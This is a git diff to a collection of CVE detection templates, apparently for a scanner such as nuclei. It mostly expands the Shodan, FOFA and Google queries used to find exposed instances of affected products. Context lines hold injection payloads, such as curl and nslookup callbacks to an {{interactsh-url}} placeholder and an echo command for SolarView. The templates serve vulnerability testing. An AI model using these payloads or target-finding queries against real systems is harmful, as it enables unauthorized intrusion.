http.title:"sidekiq" - fofa-query: title="Sidekiq" + fofa-query: + - title="Sidekiq" + - title="sidekiq" google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 468f790506..a6ec59a4d1 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: cisco product: rv340_firmware - fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" + fofa-query: + - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" + - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p" tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive variables: html_comment: "" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 8bf8628411..941fecda57 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -23,8 +23,13 @@ info: max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"dedecms" - fofa-query: app="DedeCMS" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" tags: cve,cve2023,dedecms,lfi http: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index e9557df7b7..20000ecb37 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: vmware product: aria_operations_for_logs - shodan-query: title:"vRealize Log Insight" + shodan-query: + - title:"vRealize Log Insight" + - http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" tags: cve2023,cve,vmware,aria,rce,oast diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 7821e0fcf0..5f0a0b6967 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -30,9 +30,17 @@ info: max-request: 1 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware vRealize Network Insight" - fofa-query: title="VMware vRealize Network Insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware vRealize Network Insight" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="VMware vRealize Network Insight" + - title="vmware aria operations" + - title="vmware vrealize network insight" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index de873a4c1c..ae1166a8b4 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -26,9 +26,16 @@ info: max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" - fofa-query: title="vmware vrealize network insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 26c0802963..598dd8dc5f 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -27,9 +27,16 @@ info: max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" - fofa-query: title="vmware vrealize network insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 701aa352e2..edc17ca988 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: adobe product: connect - shodan-query: title:"Adobe Connect" + shodan-query: + - title:"Adobe Connect" + - http.title:"openvpn connect" fofa-query: title="openvpn connect" google-query: intitle:"openvpn connect" tags: packetstorm,cve2023,cve,adobe,lfd,download diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index b626b9186c..1df233b19f 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -19,10 +19,16 @@ info: epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: modoboa product: modoboa - shodan-query: http.favicon.hash:1949005079 - fofa-query: body="Modoboa" + shodan-query: + - "http.favicon.hash:1949005079" + - http.html:"modoboa" + fofa-query: + - "body=\"Modoboa\"" + - body="modoboa" + - icon_hash=1949005079 tags: cve,cve2023,modoboa,exposure,disclosure http: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index f677a152bf..1cdad88f18 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud variables: name: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 24be618612..9167352c27 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 0f00ff096a..48e7e63787 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fit2cloud product: kubeoperator - shodan-query: html:"KubeOperator" - fofa-query: app="KubeOperator" + shodan-query: + - html:"KubeOperator" + - http.html:"kubeoperator" + fofa-query: + - app="KubeOperator" + - body="kubeoperator" + - app="kubeoperator" tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index bb491ff74f..caee265680 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -27,7 +27,9 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"atlassian confluence" - fofa-query: app="ATLASSIAN-Confluence" + fofa-query: + - app="ATLASSIAN-Confluence" + - app="atlassian-confluence" tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: username: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 077317adf8..d94e80ae1e 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index bb6c9943ea..29498da1ba 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax http: - raw: diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 8ccbc1aa8a..70ac355b82 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -25,9 +25,11 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index d8131fbb09..7f35da627f 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index f8a9a46def..68a638d125 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 96e550d512..1d49f2caee 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -29,8 +29,10 @@ info: max-request: 1 vendor: phpgurukul product: art_gallery_management_system - fofa-query: title="Art Gallery Management System" - tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project + fofa-query: + - title="Art Gallery Management System" + - title="art gallery management system" + tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul http: - method: GET diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index f02c6d26df..0aa91d64dd 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -29,8 +29,16 @@ info: max-request: 1 vendor: contec product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" - fofa-query: body="SolarView Compact" && title="Top" + shodan-query: + - http.html:"SolarView Compact" + - http.favicon.hash:"-244067125" + - http.html:"solarview compact" + - cpe:"cpe:2.3:o:contec:solarview_compact_firmware" + fofa-query: + - body="SolarView Compact" && title="Top" + - body="solarview compact" && title="top" + - icon_hash="-244067125" + - body="solarview compact" tags: cve,cve2023,packetstorm,solarview,rce,contec variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 82fb7bb236..cd717fa4b3 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -30,7 +30,10 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: app="MLflow" + fofa-query: + - app="MLflow" + - app="mlflow" + - title="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 101c556043..2e8636f622 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -27,7 +27,11 @@ info: max-request: 2 vendor: joomla product: joomla\! - shodan-query: html:"Joomla! - Open Source Content Management" + shodan-query: + - html:"Joomla! - Open Source Content Management" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve,cve2023,joomla,kev diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 9da9704b3e..fd454bc548 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: plesk product: obsidian - shodan-query: title:"Plesk Obsidian" - fofa-query: title="Plesk Obsidian" + shodan-query: + - title:"Plesk Obsidian" + - http.html:"plesk obsidian" + - http.title:"plesk obsidian" + fofa-query: + - title="Plesk Obsidian" + - body="plesk obsidian" + - title="plesk obsidian" google-query: intitle:"plesk obsidian" tags: cve2023,cve,header,injection,plesk,obsidian diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 852978493c..2c8467b66c 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: cdata product: arc - shodan-query: http.favicon.hash:163538942 + shodan-query: + - http.favicon.hash:163538942 + - http.favicon.hash:"163538942" fofa-query: icon_hash="163538942" tags: cve,cve2023,cdata,rsb,ssrf diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 127abc79a2..4bea2f2635 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mojoportal product: mojoportal - shodan-query: html:"mojoPortal" + shodan-query: + - html:"mojoPortal" + - http.html:"mojoportal" fofa-query: body="mojoportal" tags: cve,cve2023,cves,mojoportal,xss diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 60fe87763f..64dc1d1902 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: citrix product: gateway - shodan-query: title:"Citrix Gateway" + shodan-query: + - title:"Citrix Gateway" + - http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" tags: cve2023,cve,citrix,xss,adc diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index bed765c579..ea7445affa 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -29,7 +29,9 @@ info: max-request: 256 vendor: citrix product: sharefile_storage_zones_controller - shodan-query: title:"ShareFile Storage Server" + shodan-query: + - title:"ShareFile Storage Server" + - http.title:"sharefile storage server" fofa-query: title="sharefile storage server" google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 47806dddca..ad7ebe250d 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: phpipam product: phpipam - shodan-query: html:"phpIPAM IP address management" + shodan-query: + - html:"phpIPAM IP address management" + - http.html:"phpipam ip address management" fofa-query: body="phpipam ip address management" tags: cve2023,cve,xss,phpipam,authenticated diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 40d7f5e4a8..8d8419855b 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve,cve2023,unauth,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb http: - method: GET diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 384df1bd0e..4c4ad81018 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve2023,cve,redirect,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,redirect,pmb,pmb_project,sigb http: - method: GET diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 84c8146af2..359e6321da 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve2023,cve,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,xss,pmb,pmb_project,sigb http: - raw: diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 98bb1ce4c9..619d9328d1 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -28,9 +28,19 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - shodan-query: http.component:"vBulletin" - fofa-query: body="powered by vbulletin" - google-query: intext:"Powered By vBulletin" + shodan-query: + - http.component:"vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"Powered By vBulletin" + - intitle:"powered by vbulletin" + - intext:"powered by vbulletin" tags: cve,cve2023,vbulletin,rce http: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index d01133cc94..21eea96cbe 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: osgeo product: geoserver - shodan-query: title:"geoserver" - fofa-query: title="geoserver" + shodan-query: + - title:"geoserver" + - http.title:"geoserver" + fofa-query: + - title="geoserver" + - app="geoserver" google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index c9c2edc4e8..f0a2d25405 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: apache product: kafka_connect - shodan-query: html:"Apache Druid" + shodan-query: + - html:"Apache Druid" + - http.html:"apache druid" fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 3628b7d142..50ba96d38f 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -29,7 +29,10 @@ info: vendor: metersphere product: metersphere shodan-query: http.html:"metersphere" - fofa-query: body="Metersphere" + fofa-query: + - body="Metersphere" + - body="metersphere" + - title="metersphere" tags: cve,cve2023,metersphere,lfi variables: str: "{{rand_base(4)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index dedfb5267c..0e48695ae9 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ruckuswireless product: ruckus_wireless_admin - shodan-query: title:"ruckus wireless" + shodan-query: + - title:"ruckus wireless" + - http.title:"ruckus wireless" fofa-query: title="ruckus wireless" google-query: intitle:"ruckus wireless" tags: cve2023,cve,ruckus,rce,kev,ruckuswireless diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 952b598ee5..d5daf86b2a 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: zoneminder product: zoneminder - shodan-query: html:"ZM - Login" + shodan-query: + - html:"ZM - Login" + - http.html:"zm - login" fofa-query: body="zm - login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 21b9d3339d..b19e11dbdd 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: lexmark product: cxtpc_firmware - shodan-query: "Server: Lexmark_Web_Server" + shodan-query: + - "Server: Lexmark_Web_Server" + - "server: lexmark_web_server" tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 9fe41a81d3..df55ab250b 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -29,7 +29,9 @@ info: vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira fofa-query: title=jira google-query: intitle:jira tags: cve2023,cve,lfi,jira,cms,atlassian,stagil diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 4b3b04e8b6..622f061d87 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -29,7 +29,9 @@ info: vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira fofa-query: title=jira google-query: intitle:jira tags: cve,cve2023,lfi,jira,cms,atlassian,stagil diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e67b747c7f..e930909f0d 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -24,8 +24,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,auth-bypass diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index afbeaa7449..c9ec533f79 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -21,16 +21,22 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.94391 - epss-percentile: 0.99045 + epss-score: 0.96298 + epss-percentile: 0.99537 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 3055c93f20..99c2bff499 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2648 cwe-id: CWE-434 - epss-score: 0.05365 - epss-percentile: 0.9293 + epss-score: 0.08638 + epss-percentile: 0.94483 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: weaver product: e-office - fofa-query: app="泛微-EOffice" + fofa-query: + - app="泛微-EOffice" + - app="泛微-eoffice" tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index b3bef1f57a..781ca70bf6 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atutor product: atutor - shodan-query: http.html:"Atutor" + shodan-query: + - http.html:"Atutor" + - http.html:"atutor" fofa-query: body="atutor" tags: cve,cve2023,xss,atutor diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 85a9e396e0..1dca70f4f0 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -19,12 +19,12 @@ info: cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: idnovate - product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter + product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" framework: prestashop - shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,advancedpopupcreator + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate http: - raw: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index e668a74cea..3889cedc25 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: appwrite product: appwrite - shodan-query: title:"Sign In - Appwrite" - fofa-query: icon_hash=-633108100 + shodan-query: + - title:"Sign In - Appwrite" + - http.title:"sign in - appwrite" + - http.favicon.hash:-633108100 + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 561a9c1e67..9ee18735bd 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"opencats" + shodan-query: + - title:"opencats" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2023,cve,authenticated,tenable,opencats,redirect diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 7f1c5ccad0..fc7b92ae06 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -30,6 +30,9 @@ info: vendor: inspireui product: mstore_api framework: wordpress + publicwww-query: /wp-content/plugins/mstore-api/ + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui http: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 3d4550d423..8f03713c44 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -29,8 +29,14 @@ info: max-request: 10 vendor: papercut product: papercut_mf - shodan-query: 